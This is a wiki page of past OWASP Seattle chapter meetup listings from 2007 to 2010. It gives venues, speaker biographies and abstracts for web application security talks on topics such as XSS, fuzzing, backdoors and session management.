The demands of regulatory compliance may have you looking to vulnerability scanning tools in the hopes of finding a silver bullet to examine your web applications. However, it is not realistic to expect scanners alone to accurately determine the impact of the web application vulnerabilities they detect. In this presentation, Walter Pearce and Wade Winright will discuss best practices for securing web applications, including how to effectively utilize tools in conjunction with penetration testing.&lt;br /&gt;
&lt;br /&gt;
'''Walter Pearce''' is a Senior Security Consultant at IOActive, experienced in enterprise-level application assessment and consultation. At IOActive he performs penetration testing, identifies system vulnerabilities, and designs custom security solutions for clients in software development, telecommunications, financial services, and professional services. Pearce has performed security assessments and IT security support services for many companies in the Fortune 100, including involvement in the largest existing penetration test of a major educational institution. He regularly leads IOActive training courses on numerous topics that include web application security, secure coding in C# or C++, and threat modeling.&lt;br /&gt;
&lt;br /&gt;
'''Wade Winright''' is a Security Consultant at IOActive, experienced in security testing, and network and systems installation and configuration. At IOActive he performs vulnerability and enterprise risk assessments of application, systems, and infrastructure, and designs custom security solutions for clients in software development, telecommunications, financial services, and professional services.&lt;br /&gt;
Winright is a SANS GIAC Certified Incident Handler with a focus on incident handling and hacker tools/techniques, and is also certified by the E-Commerce Council CEH, focused on vulnerability/penetration testing and countermeasures.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
'''Protecting Your Applications from Backdoors:'''&lt;br /&gt;
&lt;br /&gt;
How to Secure Your Business Critical Applications from Time Bombs, Backdoors &amp;amp; Data&lt;br /&gt;
&lt;br /&gt;
'''Speaker:''' Clint Pollock from Veracode&lt;br /&gt;
&lt;br /&gt;
With the increasing practice of outsourcing and using 3rd party libraries, it is nearly impossible for an enterprise to identify the pedigree and security of the software running its business critical applications. As a result, backdoors and malicious code are increasingly becoming the prevalent attack vector used by hackers. Whether you manage internal development activities, work with third party developers or are developing a COTS application for enterprise, your mandate is clear: safeguard your code and make application security a priority for internal and external development teams. In this session we will cover:&lt;br /&gt;
*Prevalence of backdoors and malicious code in third party attacks&lt;br /&gt;
*Definitions and classifications of backdoors and their impact on your applications&lt;br /&gt;
*Methods to identify, track and remediate these vulnerabilities&lt;br /&gt;
&lt;br /&gt;
'''Clint Pollock''' is a Senior Solutions Architect at Veracode. Since 1997, he has also created security solutions for large-scale enterprise environments on behalf of CREDANT Technologies and Netegrity. In his current role, Clint helps globally distributed organizations evaluate, track, and mitigate their online business risk. Clint's greatest strengths are his enthusiasm, experience and determination to help customers succeed in maintaining secure, compliant systems, and avoid the consequences and bad headlines that come with application security breaches. Clint resides in Chicago, IL.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 3 February (Wednesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 2/3/2010 @ 6:30ish&lt;br /&gt;
&lt;br /&gt;
'''Speakers:''' &lt;br /&gt;
&lt;br /&gt;
'''Speaker: Hidetake Jo'''&lt;br /&gt;
&lt;br /&gt;
'''Same Origin Policy'''&lt;br /&gt;
&lt;br /&gt;
'''Presentations:'''&lt;br /&gt;
&lt;br /&gt;
[[File:SameOriginPolicy.ppt]] - Same Origin Policy slide deck&lt;br /&gt;
&lt;br /&gt;
[[File:Rendezvous.ppt]] - Presentation on the Rendezvous toolset&lt;br /&gt;
&lt;br /&gt;
Same origin policy is a simple and important security policy which protects millions of users on the web.  Oftentimes the policy is oversimplified and there is a misconception that there is one consistent policy being used across all web technologies.  Unfortunately this couldn’t be further from the truth.  Different browser brands, RIA plugins, various scripting languages and features within the browser environment have their own interpretation of the same origin policy.  Not understanding the subtle differences can be catastrophic to web security.  This presentation tries to summarize the deltas in the same origin policy.  This is also a call to action to involve the community to more comprehensively document the policies. &lt;br /&gt;
&lt;br /&gt;
'''Hidetake Jo''' is part of the Trustworthy Computing team in Office.  He works with teams throughout Office to identify threats and ways to mitigate those threats; he also gets to break stuff.  Hidetake has written many penetration testing tools that are used throughout Microsoft.&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Pravir Chandra'''&lt;br /&gt;
&lt;br /&gt;
'''Open Software Assurance Maturity Model (OpenSAMM)'''&lt;br /&gt;
&lt;br /&gt;
'''Presentation:''' &lt;br /&gt;
&lt;br /&gt;
Slide deck can be found [http://www.opensamm.org/downloads/OpenSAMM-1.0.ppt here]&lt;br /&gt;
&lt;br /&gt;
The Open Software Assurance Maturity Model (SAMM) (http://www.opensamm.org/) is a flexible and prescriptive framework for building security into a software development organization. Covering more than typical SDLC-based models for security, SAMM enables organizations to self-assess their security assurance program and then use recommended roadmaps to improve in a way that's aligned to the specific risks facing the organization. Beyond that, SAMM enables creation of scorecards for an organization's effectiveness at secure software development throughout the typical governance, development, and deployment business functions. Scorecards also enable management within an organization to demonstrate quantitative improvements through iterations of building a security assurance program. This workshop will introduce the SAMM framework and walk through useful activities such as assessing an assurance program, mapping an existing organization to a recommended roadmap, and iteratively building an assurance program. Time allowing, additional case studies will also be discussed. OpenSAMM is an open and free project and has recently been donated to the Open Web Application Security Project (OWASP) Foundation. For more information on OpenSAMM, visit http://www.opensamm.org/.&lt;br /&gt;
&lt;br /&gt;
'''Pravir Chandra''' is Director of Strategic Services at Fortify Software and works with clients on software security assurance programs. Pravir is recognized for his expertise in software security, code analysis, and his ability to strategically apply technical knowledge. Prior to Fortify, he was a Principal Consultant affiliated with Cigital and led large software security programs at Fortune 500 companies. Pravir co-founded Secure Software, Inc. and was Chief Security Architect prior to its acquisition by Fortify. He recently created and led the Open Software Assurance Maturity Model (OpenSAMM) project with the OWASP Foundation, leads the OWASP CLASP project, and also serves as a member of the OWASP Global Projects Committee. Pravir is author of the book Network Security with OpenSSL.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 11 August (Tuesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 8/11/2009 @ 6:30ish&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Anil Kumar Revuru'''&lt;br /&gt;
&lt;br /&gt;
'''Slides: ''' [[file:Anti-XSS_3.0_RV.pptx]]&lt;br /&gt;
&lt;br /&gt;
'''The Microsoft Anti-Cross-Site Scripting Library'''&lt;br /&gt;
&lt;br /&gt;
The Microsoft Anti-Cross-Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique — sometimes referred to as the principle of inclusions — to provide protection against XSS attacks.  This approach works by first defining a valid or allowable set of characters, and encodes anything outside this set (invalid characters or potential attacks).  The white-listing approach provides several advantages over other encoding schemes. The following are some new features of the Anti-XSS library v3.0.&lt;br /&gt;
*An expanded white list that supports more languages&lt;br /&gt;
*Performance improvements&lt;br /&gt;
*Performance data sheets (in the online help)&lt;br /&gt;
*Support for Shift_JIS encoding for mobile browsers&lt;br /&gt;
*Security Runtime Engine (SRE) HTTP module&lt;br /&gt;
*A sample application&lt;br /&gt;
 &lt;br /&gt;
In this session, we will learn in-depth how Anti-XSS works and learn more about its new features.&lt;br /&gt;
&lt;br /&gt;
'''Anil Kumar Revuru''' currently works for the Information Security Tools team at Microsoft as a Senior SDE, where he is responsible for architecting security tools. In his previous life at Microsoft, Anil conducted security design reviews, threat modeling, and application and source-code assessments. He has authored security tools and has presented security courses internally at Microsoft. He excelled in his abilities by developing security tools such as the Microsoft Threat Analysis and Modeling Tool and the Anti-XSS Library. Anil holds a Diploma in Mechanical Engineering from JNTU Hyderabad. Anil displayed expert proficiency in the substantive and technical areas of design and development. He has a keen interest in photography, Xbox and computer hardware.&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Andre Gironda'''&lt;br /&gt;
&lt;br /&gt;
'''Using ASVS with the Code Review Guide, Testing Guide, and Time Management'''&lt;br /&gt;
&lt;br /&gt;
The OWASP Application Security Verification Standard, which defines&lt;br /&gt;
four levels of web application security verification, lays down a&lt;br /&gt;
framework for security architecture review. While the ASVS includes&lt;br /&gt;
many requirements for controls, it does not suggest which tools,&lt;br /&gt;
techniques, timeline or methodologies to utilize. The OWASP Code&lt;br /&gt;
Review and Testing Guides provide the technical practices and suggest&lt;br /&gt;
or hint at tools, but also lack the timeline and methodology necessary&lt;br /&gt;
to complete an application penetration-test or SDLC integration&lt;br /&gt;
project for proper application security hygiene.&lt;br /&gt;
&lt;br /&gt;
This presentation will provide the 1000 foot view all the way down to&lt;br /&gt;
the nitty gritty details of how to perform ASVS activities using OWASP&lt;br /&gt;
resources, as well as some OWASP and non-OWASP tools (freeware or&lt;br /&gt;
demoware). Example timelines for typical ASVS activities, including&lt;br /&gt;
reports, will be discussed so that any sort of application security&lt;br /&gt;
project can be scoped properly, delivered on-time, and within budget.&lt;br /&gt;
&lt;br /&gt;
'''Andre Gironda''' is an application security specialist with a global&lt;br /&gt;
security consulting firm providing IT security services to the Fortune&lt;br /&gt;
500 and financial institutions as well as U.S. and foreign&lt;br /&gt;
governments. Prior to his current employment, Andre held a number of&lt;br /&gt;
payment application security positions in addition to working for the&lt;br /&gt;
largest online auction website. He is currently a leader for the Open&lt;br /&gt;
Web Application Security Project (OWASP), where he co-produces the&lt;br /&gt;
global OWASP News Podcast.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 28 April (Tuesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
'''Date:''' 4/28/2009&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Scott Stender'''&lt;br /&gt;
&lt;br /&gt;
'''Securing our Legacy - Responding to the call to provide practical security assurance'''&lt;br /&gt;
&lt;br /&gt;
Every few months sees the release of a much-hailed report from an industry organization, think tank, or government agency calling for the software that runs our critical infrastructure to be secured.   Making the call is easy, acting on it is only slightly harder, but succeeding at it is incredibly difficult.&lt;br /&gt;
 &lt;br /&gt;
Of all of the tasks that must be undertaken to truly meet the call, the single biggest challenge I have seen companies face is delivering security assurance on legacy code.  This talk will explore the challenge of providing security assurance for these old, little-loved, but heroic systems that power our lives.   More importantly, it will include guidance for software development managers and engineers seeking to gain insight into the operation of their legacy systems, mechanisms by which important security assertions can be gathered, and practical methods for carrying out penetration tests and code reviews with the aim of providing a high degree of security assurance.&lt;br /&gt;
 &lt;br /&gt;
Scott Stender is a co-founder and Partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at @stake and Microsoft in previous lives.&lt;br /&gt;
 &lt;br /&gt;
In his research, Scott focuses on secure software engineering methodology and analysis of core technologies. Scott has been published in publications such as IEEE Security &amp;amp; Privacy, and has presented at Microsoft Blue Hat and at Black Hat conferences on several occasions. Scott holds a BS in Computer Engineering from the University of Notre Dame.&lt;br /&gt;
-----------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Ashok Misra'''&lt;br /&gt;
&lt;br /&gt;
'''Application Issues with encryption of PANs'''&lt;br /&gt;
&lt;br /&gt;
There are unique application issues related to the storage and processing of credit card numbers for ecommerce transaction processing. This talk focuses on issues with the various cryptographic primitives used for PANs.&lt;br /&gt;
  &lt;br /&gt;
Ashok Misra is an Ecommerce professional with more than 10 years' experience delivering results for leading ecommerce merchants.&lt;br /&gt;
 &lt;br /&gt;
He is currently Sr. Manager Payments &amp;amp; Security in the Media Applications Platform Development Division for e-Commerce products for Real Networks, Inc in Seattle, Washington. He brings an unusually comprehensive insight into security and payments processing.&lt;br /&gt;
 &lt;br /&gt;
Ashok is responsible for the Billing for Real’s Consumer Divisions. He takes a leadership role in identifying new opportunities in the consumer payments domain. He has extensive hands-on experience in merchant integration with several leading payment providers.&lt;br /&gt;
 &lt;br /&gt;
Prior to working with Real Networks he built backend components for ecommerce for Amazon.com.&lt;br /&gt;
 &lt;br /&gt;
He has comprehensive domain knowledge in consumer payments over the internet with Credit Cards, EU Direct Debit, Real time Bank Transfers, Redirect Payment Instruments, Fraud Detection and PCI Compliance.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 23 October (Thursday) ===&lt;br /&gt;
&lt;br /&gt;
'''Location:''' 810 Third Avenue&lt;br /&gt;
&lt;br /&gt;
Seattle, WA 98104&lt;br /&gt;
&lt;br /&gt;
Conference room on the first floor &lt;br /&gt;
&lt;br /&gt;
'''Date:''' 10/23/2008&lt;br /&gt;
&lt;br /&gt;
'''Time:''' 6:30PM&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Michael Eddington'''&lt;br /&gt;
&lt;br /&gt;
'''Fuzzjacking!'''&lt;br /&gt;
&lt;br /&gt;
Fuzzing is one of the hot new buzzwords in the security industry and&lt;br /&gt;
if your clients have not already asked for it, they will.  This talk will&lt;br /&gt;
introduce the subject, talk about different types of fuzzers,&lt;br /&gt;
integration into SDL, when to fuzz and also talk a bit about the Peach&lt;br /&gt;
Fuzzing Platform.  Questions and interaction requested :)&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Michael Eddington is a founding principal of Leviathan Security Group with over ten years'&lt;br /&gt;
experience in computer security, with expertise in application and&lt;br /&gt;
network security, through threat modeling. Michael founded the&lt;br /&gt;
security services practice for IOActive and co-founded the Security&lt;br /&gt;
Services Center for Hewlett-Packard's services division. Michael is&lt;br /&gt;
also an accomplished software developer, having participated in a&lt;br /&gt;
number of open-source security development projects ranging from the&lt;br /&gt;
Trike threat modeling conceptual framework to the Peach Fuzzer&lt;br /&gt;
Platform.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Chris Weber'''&lt;br /&gt;
&lt;br /&gt;
'''Exploiting Unicode-enabled Software'''&lt;br /&gt;
&lt;br /&gt;
This talk will showcase some of the ways that Unicode has been leveraged to cause software to break. We will survey the security issues outlined in Unicode Technical Reports 36 and 39. The issues highlighted will be illustrated by examples of historical Unicode-related security flaws in popular software and Web applications. For each vulnerability we will assess the damage that was inflicted, describe how the exploit worked, and discuss the root cause. Examples will include demonstrations of how clever attackers can exploit Unicode-enabled software to run arbitrary code or take over the machine.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Chris Weber co-founded Casaba Security, which focuses on security testing for some of the world's leading software development companies and online properties. He has authored several security books, articles and presentations. He has worked as a security researcher and consultant for seven years and has identified hundreds of security vulnerabilities in many widely used software products.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 12 June (Thursday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
	&lt;br /&gt;
	&lt;br /&gt;
'''Date:''' 06/12/2008&lt;br /&gt;
&lt;br /&gt;
'''Time:''' 6:30PM&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Taylor McKinley'''&lt;br /&gt;
&lt;br /&gt;
'''Dynamic Taint Propagation: Finding Vulnerabilities Without Attacking'''&lt;br /&gt;
&lt;br /&gt;
Dynamic taint propagation allows testers to find vulnerabilities without modifying existing functional tests. It enables true security testing inside a QA organization because it allows tight integration with existing QA infrastructure and solid usability for non-security experts. This talk will:&lt;br /&gt;
&lt;br /&gt;
*Explain how dynamic taint propagation works.&lt;br /&gt;
*Show how to retrofit an existing executable to perform dynamic taint propagation.&lt;br /&gt;
*Demonstrate how a tester can use a typical suite of functional tests to find vulnerabilities, without the need for malicious input or security expertise.&lt;br /&gt;
*Compare this approach with the effectiveness of popular penetration testing tools--particularly those acquired by IBM and HP in 2007--when deployed in a QA environment.&lt;br /&gt;
&lt;br /&gt;
The talk will conclude with a look towards the future of security testing in the QA environment and an overview of how multiple analysis techniques, both static and dynamic, can work together to provide better software assurance.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Taylor McKinley''', Product Manager, Fortify Software&lt;br /&gt;
&lt;br /&gt;
Mr. McKinley brings a rich business and technology background to Fortify Software, including strategic advisory roles at Morgan Stanley Dean Witter, New England Capital Partners and as a Principal at The Parthenon Group. Mr. McKinley has a BA from Williams College and an MBA from Stanford Business School.&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Scott Stender'''&lt;br /&gt;
&lt;br /&gt;
'''Concurrency Attacks in Web Applications'''&lt;br /&gt;
&lt;br /&gt;
Modern web application frameworks are designed for developer productivity and performance. They are highly scalable, object-oriented, and can be used to create a usable web site in a matter of minutes.&lt;br /&gt;
&lt;br /&gt;
Highly parallelized, object-oriented web application frameworks encourage programming practices that make managing state difficult for a typical programmer. In order to have a web application that is robust in a multi-threaded environment, the developer must carefully manage access to all resources that can be shared by threads. Global variables, session variables, database access, and back-end systems are common examples of such resources, not to mention application-specific resources.&lt;br /&gt;
&lt;br /&gt;
Concurrency flaws result when security-sensitive resources are not managed properly. As we have seen with almost every other prevalent class of security flaws, mistakes happen often when doing the right thing is difficult. To make things worse, concurrency flaws are often subtle and are identified only through difficult targeted testing.&lt;br /&gt;
&lt;br /&gt;
This presentation will provide brief technical background on this class of flaw and enumerate testing techniques that help identify when flaws are present.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Scott Stender''' is a founding partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at companies such as @stake and Microsoft. Scott is a noted researcher who focuses on secure software engineering and security analysis of core technologies. He holds a BS in Computer Engineering from the University of Notre Dame.&lt;br /&gt;
&lt;br /&gt;
=== Previous Event 4 March (Tuesday) ===&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
	&lt;br /&gt;
	&lt;br /&gt;
'''Date:''' 03/04/2008&lt;br /&gt;
&lt;br /&gt;
'''Time:''' 6:30PM&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Billy Rios'''&lt;br /&gt;
&lt;br /&gt;
'''Bad Sushi - Beating Phishers at Their Own Game'''&lt;br /&gt;
&lt;br /&gt;
This talk will expose tactics and tools used by phishers, show how easy it is to hack into servers that are used to perform phishing, and demonstrate how easy it is to follow a phisher's trail to find out how they share information on US Citizens including SSNs, bank account numbers, credit card numbers, ATM PINs, you name it.&lt;br /&gt;
&lt;br /&gt;
Phishers usually set up their sites on servers they have compromised. In other words, the phishers have already done the hard work and it is easy to gain access to these servers. Due to the sheer volume of sites that need to be set up to perform a successful phish, phishers tend to be sloppy and leave traces everywhere.&lt;br /&gt;
&lt;br /&gt;
This talk will expose some of the tactics and tools used by phishers. Actual walk-through of how compromised hosts were accessed to gain information about the phishers will be presented.&lt;br /&gt;
&lt;br /&gt;
This talk will also show how easy it is to construct a trail from a compromised host to obtain information about individuals that is spewed on hacker message boards located outside the United States.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
'''Billy Rios''' lives in a phish bowl and is constantly being sent emails from acquaintances all over the world. Billy has won the Internet lotto several times, is expecting large sums of abandoned money from a long lost relative in the Congo, and has received checks accidentally made out for 30,000 instead of 30 US dollars.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Speaker: Jon McClintock'''&lt;br /&gt;
&lt;br /&gt;
Session management is one of the most overlooked areas of web application security, and yet it can also be the most challenging feature to get right in your web application. This talk will provide a brief overview of web session management, followed by an exposition into how several common web application frameworks implement session management, finishing with a discussion of several classes of vulnerabilities that can arise through poor session management.&lt;br /&gt;
&lt;br /&gt;
'''Jon McClintock''' is a Senior Consultant for Leviathan Security Group, where he specializes in application security from design through implementation and into deployment. Prior to Leviathan, Jon was a Senior Software Engineer on Amazon.com's Information Security team, where he worked with software teams to define security requirements, assess application security, and educate developers about security software best practices.&lt;br /&gt;
&lt;br /&gt;
'''Date: 1/23/2008'''&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Waqas Nazir''', DigitSec&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/images/e/e9/Emerging_Threats_in_Distributed_Applications_%28Web_2%29.ppt presentation]&lt;br /&gt;
&lt;br /&gt;
Waqas Nazir has been working as an Information Security Consultant for clients such as Microsoft where he has delivered services in various arenas of information security. These include code reviews, black box assessments, product reviews, custom tools development for complex security problems, policy and process development. He has also worked with Microsoft Research (MSR) to develop a code analysis tool used for identifying areas of vulnerabilities in code. He has also been featured in Microsoft's Information Security Newsletter.&lt;br /&gt;
&lt;br /&gt;
Presentation Title: Emerging threats in Web 2.0&lt;br /&gt;
&lt;br /&gt;
Web 2.0 applications provide many rich features today, such as hosting third party RSS feeds, hosting third party web pages, translation services, and cross domain communication. While these rich features provide great functionality to end users, they can have serious security implications if not designed properly. Moreover, implementation flaws plague many of these features. This presentation will focus on some new emerging threats to Web 2.0 applications from a design and implementation perspective, leaving out the often-covered Web 2.0 vulnerabilities (Ajax, XSRF, etc.).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Chris Clark''', iSEC Partners&lt;br /&gt;
&lt;br /&gt;
Chris Clark is a Senior Security Consultant at iSEC Partners, Inc. He possesses several years of experience in secure application design, penetration testing, and security process management. Most recently Chris worked for Microsoft performing security analysis and verification on enterprise management software and was previously responsible for the security of a web-based payment platform processing over 20 million credit card transactions per day. Chris has extensive experience in developing and delivering security trainings for large organizations, software engineering utilizing Win32 and the .Net Framework, and analyzing threats to large scale distributed systems. At Microsoft, Chris was responsible for the coordination of multiple product groups following the Microsoft Secure Development Lifecycle.&lt;br /&gt;
&lt;br /&gt;
Presentation Title: Ruby on Rails Security&lt;br /&gt;
&lt;br /&gt;
Ruby on Rails has been hailed for its ability to increase developer productivity by making web development easier.  Though Ruby on Rails may help developers create sites more quickly, it is no more immune to security threats than other web development frameworks.  Chris Clark will present the means by which the OWASP Top Ten manifest themselves in a Ruby on Rails environment, provide best practices for preventing these attacks, and discuss his ongoing research in Ruby-specific security concerns.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
11/29/2007 @ 6:30PM PST - Seattle chapter meeting&lt;br /&gt;
&lt;br /&gt;
'''Location:''' Bellevue Las Margaritas&lt;br /&gt;
&lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
	&lt;br /&gt;
	&lt;br /&gt;
'''Date:''' 11/29/2007&lt;br /&gt;
&lt;br /&gt;
'''Time:''' 6PM&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
&lt;br /&gt;
'''Tom Gallagher''' has been intrigued with both physical and computer security from a young age. He is currently the lead of the Microsoft Office Security Test team. This team is primarily focused on penetration testing, writing security testing tools, and educating program managers, developers, and testers about security issues. Tom recently co-authored the MSPress title &amp;quot;Hunting Security Bugs&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Presentation Title: Hunting security bugs in your code&lt;br /&gt;
&lt;br /&gt;
Description: Finding security bugs is often regarded as an activity requiring secret powers or extremely specialized knowledge.  Some security bugs are difficult to uncover and require deep knowledge.  However, with basic knowledge many areas can be tested without much effort.  This presentation will show how to perform basic security testing using simple tools and the difference in effort between finding a bug and exploiting it.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''David E Stevens III''', Senior ROI Analyst, Symplified Inc.&lt;br /&gt;
&lt;br /&gt;
In 2006, Symplified recruited Stevens for his expertise and ability to clearly explain concepts like Return On Investment (ROI) and Total Cost of Ownership (TCO). Over the past 5 years Stevens has given dozens of presentations regarding ROI, and is a confident and charismatic speaker. Stevens is touring the U.S. representing Symplified and teaching how ROI can be applied to security and Identity investments to technical security user groups.&lt;br /&gt;
&lt;br /&gt;
Synopsis of &amp;quot;Understanding ROI, TCO and other key financial aspects of IT Security&amp;quot;&lt;br /&gt;
&lt;br /&gt;
In this presentation, Stevens teaches how security and IT professionals can obtain financing for important security initiatives using accounting principles such as Return On Investment (ROI) and Total Cost of Ownership (TCO). In this 30-minute presentation, the group learns what these terms mean and how they can be used to show the value of security software purchases. He concludes by sharing other tips on how the technology professional can better communicate with their business counterparts. This non-sales presentation is intended to equip attendees with useful tools that articulate the benefits of investing in IT security. Learn from Symplified's more than 30 years combined experience in Identity Management at hundreds of Fortune 500 organizations worldwide. Attendees receive a useful ROI calculator for IDM investments. This is a must attend presentation for anyone who has ever had trouble getting the funding they needed for a security software investment!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
09/06/2007 @ 6PM PST - Seattle chapter meeting&lt;br /&gt;
&lt;br /&gt;
'''Details:'''&lt;br /&gt;
Location: &lt;br /&gt;
Bellevue Las Margaritas &lt;br /&gt;
437 108th Ave NE&lt;br /&gt;
Bellevue, WA 98004&lt;br /&gt;
(425) 453-0535&lt;br /&gt;
&lt;br /&gt;
Time: 6 o'clock&lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
* '''Rob Rachwald''' - Rob is a 10-year veteran of the high tech industry. Rob started his tech career at Intel, where he worked on automating their complex supply chain. Rob managed US product marketing for Commerce One and managed their marketing efforts in Asia Pacific. Rob then managed marketing for Coverity and joined Fortify as the Director of Product Marketing focusing on security and financial services. &lt;br /&gt;
** Online Banking - Abstract: Banks, often the biggest target of cyber attacks, have set an example for responsible security strategies.  How do the world's leading financial institutions balance risk against the pressures of delivering software to customers quickly?  How are developers trained to write code securely?  How are software security tools, such as dynamic and static analysis, deployed for optimal use?&lt;br /&gt;
* '''Damon Cortesi''' - Damon has worked in network and application security risk management for nearly a decade, beginning with his work as Systems and Security Administrator at his alma mater. Following school, he entered the professional arena as an Information Security Consultant for one of the top 10 CPA firms serving financial institutions including banks, credit unions, and even the major credit reporting bureaus. Most recently at IOActive, Mr. Cortesi has been serving the specialized needs of top technology companies in addition to standard penetration testing, web application security assessments, source code reviews, and PCI assessments.&lt;br /&gt;
** Web Hacking 101 introduces the basic concepts of web application security including SQL Injection, Cross-Site Scripting (XSS), and typical application logic flaws found in an ASP-based web application. These concepts are then put to use in a live demonstration that illustrates the all-too-common ways of attacking a web application and gaining unauthorized access to sensitive information or restricted areas of a website. Demos will include manual SQL Injection techniques as well as the use of free/open-source tools used to expedite the extraction process, examples of both reflected and stored XSS that can be used to elevate the privileges of a user, and standard authorization bypass issues that developers often ignore. Finally, basic mitigation techniques will be discussed that can be put into place by developers to prevent these common hacking techniques.&lt;br /&gt;
&lt;br /&gt;
''' Update: ''' - Rob's slides can be downloaded from [http://www.owasp.org/images/f/f6/SANS_Online_Banking_Case_study.ppt here].&lt;br /&gt;
''' Update #2: ''' - Damon's slides can be found [https://www.owasp.org/images/3/32/Web_Hacking_101.pdf here].&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
2/28/2007 @ 6PM PST - Seattle chapter meeting&lt;br /&gt;
&lt;br /&gt;
'''Details:'''&lt;br /&gt;
&lt;br /&gt;
Location: Bellevue Las Margaritas (http://www.lasmargaritasbellevue.com/)&lt;br /&gt;
&lt;br /&gt;
Time: 6 o’clock. &lt;br /&gt;
&lt;br /&gt;
'''Speakers:'''&lt;br /&gt;
* '''Dinis Cruz (Chief OWASP Evangelist)''' - Directly from London, Dinis will be doing the following presentations at this event:&lt;br /&gt;
** '''Buffer Overflows on .Net and Asp.Net''' - One of the common myths about the .Net Framework is that it is immune to Buffer Overflows. Although this might be correct for pure managed and verifiable .Net code, a large percentage of .Net and Asp.Net application code is unmanaged code. In this talk Dinis will show the areas in .Net and Asp.Net applications that are vulnerable to Buffer Overflows (including a demo of a .Net Buffer Overflow Fuzzer).&lt;br /&gt;
** '''OWASP, the Open Web Application Security Project''' - The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. All of the OWASP tools, documents, blogs, and chapters are free and open to anyone interested in improving application security. In this presentation Dinis will show the latest guides and tools from OWASP which should be part of every company's security efforts.&lt;br /&gt;
** '''0wning Vista's userland - The CAS / UAC missed opportunity, and what I think MS should have done''' - In this presentation Dinis will explore the missed opportunity by Microsoft to use technologies like .Net's CAS (Code Access Security) and Vista's UAC (User Account Control) to create secure and trustworthy userland environments that protect the user's assets. In the hope that it might make a small difference, ideas and solutions for the future will also be presented.&lt;br /&gt;
&lt;br /&gt;
* '''Brad Hill (Senior Security Consultant with iSEC Partners)''',  will be speaking on:&lt;br /&gt;
